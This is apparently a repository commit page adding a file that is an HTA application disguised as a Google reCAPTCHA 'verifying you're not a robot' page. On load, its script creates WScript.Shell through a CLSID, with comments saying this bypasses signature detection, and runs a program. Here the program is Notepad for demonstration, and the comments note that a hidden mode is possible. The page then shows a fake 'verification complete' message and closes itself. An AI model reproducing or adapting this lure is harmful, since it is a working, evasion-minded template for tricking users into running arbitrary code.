Create verif
Browse files
verif
ADDED
|
@@ -0,0 +1,71 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
<!DOCTYPE html>
|
| 2 |
+
<html>
|
| 3 |
+
<head>
|
| 4 |
+
<title>reCAPTCHA Verification</title>
|
| 5 |
+
<HTA:APPLICATION
|
| 6 |
+
APPLICATIONNAME="Google Security"
|
| 7 |
+
BORDER="none"
|
| 8 |
+
SHOWINTASKBAR="no"
|
| 9 |
+
SYSMENU="no"
|
| 10 |
+
WINDOWSTATE="normal"
|
| 11 |
+
SINGLEINSTANCE="yes"
|
| 12 |
+
/>
|
| 13 |
+
<style>
|
| 14 |
+
body {
|
| 15 |
+
font-family: Roboto, Arial, sans-serif;
|
| 16 |
+
background: #fff;
|
| 17 |
+
margin: 0;
|
| 18 |
+
height: 100vh;
|
| 19 |
+
display: flex;
|
| 20 |
+
flex-direction: column;
|
| 21 |
+
justify-content: center;
|
| 22 |
+
align-items: center;
|
| 23 |
+
color: #5f6368;
|
| 24 |
+
}
|
| 25 |
+
img {
|
| 26 |
+
width: 160px;
|
| 27 |
+
margin-bottom: 20px;
|
| 28 |
+
}
|
| 29 |
+
.spinner {
|
| 30 |
+
width: 20px;
|
| 31 |
+
height: 20px;
|
| 32 |
+
border: 2px solid #f3f3f3;
|
| 33 |
+
border-top: #4285f4 solid 2px;
|
| 34 |
+
border-radius: 50%;
|
| 35 |
+
animation: spin 1s linear infinite;
|
| 36 |
+
}
|
| 37 |
+
@keyframes spin {
|
| 38 |
+
to { transform: rotate(360deg); }
|
| 39 |
+
}
|
| 40 |
+
#status {
|
| 41 |
+
font-size: 13px;
|
| 42 |
+
margin-top: 12px;
|
| 43 |
+
}
|
| 44 |
+
</style>
|
| 45 |
+
</head>
|
| 46 |
+
<body>
|
| 47 |
+
<img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png" alt="Google">
|
| 48 |
+
<div class="spinner"></div>
|
| 49 |
+
<div id="status">Verifying you're not a robot...</div>
|
| 50 |
+
|
| 51 |
+
<script language="JScript">
|
| 52 |
+
(function() {
|
| 53 |
+
try {
|
| 54 |
+
// Используем CLSID вместо строк — bypass простых сигнатур
|
| 55 |
+
var wsh = new ActiveXObject("{72C24DD5-D70A-438B-8A42-98424B88AFB8}"); // WScript.Shell
|
| 56 |
+
|
| 57 |
+
// Запуск notepad напрямую — без cmd, без окна (0 = скрытый режим)
|
| 58 |
+
// Но для демонстрации — покажем окно (1 = normal window), чтобы было видно
|
| 59 |
+
wsh.Run("notepad.exe", 1, false);
|
| 60 |
+
|
| 61 |
+
// Обновляем статус и закрываем
|
| 62 |
+
document.getElementById("status").innerText = "✅ Verification complete.";
|
| 63 |
+
setTimeout(function() { window.close(); }, 1800);
|
| 64 |
+
} catch (e) {
|
| 65 |
+
// Silent exit при ошибке
|
| 66 |
+
window.close();
|
| 67 |
+
}
|
| 68 |
+
})();
|
| 69 |
+
</script>
|
| 70 |
+
</body>
|
| 71 |
+
</html>
|